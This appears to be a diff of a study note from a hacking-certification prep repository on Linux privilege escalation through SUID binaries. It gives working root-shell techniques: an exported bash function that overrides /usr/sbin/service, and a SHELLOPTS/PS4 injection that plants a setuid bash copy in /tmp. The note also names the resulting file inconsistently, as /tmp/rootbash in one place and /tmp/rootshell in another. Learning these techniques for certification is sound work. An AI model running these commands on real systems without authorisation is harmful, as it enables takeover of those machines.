floyddc/Hacking-Cert-Prep/notes/Linux Priv Esc/3-SUID-SGID.md

 - So let's create a custom function that executes bash code:
   - `function /usr/sbin/service { /bin/bash -p; }` to run a root shell
   - `export -f /usr/sbin/service`
-- Now, running the binary we should be able to gain access to a root. shell.
+- Now, running the binary we should be able to gain access to a root shell.
+Check it with `whoami`.

+If the shell version is above that one, anyway it will read `SHELLOPTS` and `PS4` variables before removing the SUID privileges (known bug).
+So we can exploit it with:
+  - `env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' <BINARY PATH>` in which:
+    - `env -i` executes a program in an empty environment, without inheriting any variables.
+    - `SHELLOPTS=xtrace` turns on the debug mode.
+    - `PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)'` sets a debugging prompt, that will be printed before each command.
+      - It copies Bash in the `/tmp` directory and gives it execution permissions with UID = 0 (root)
+- Now, running the shell with `/tmp/rootshell`, we should be able to gain access to a root shell.
 Check it with `whoami`.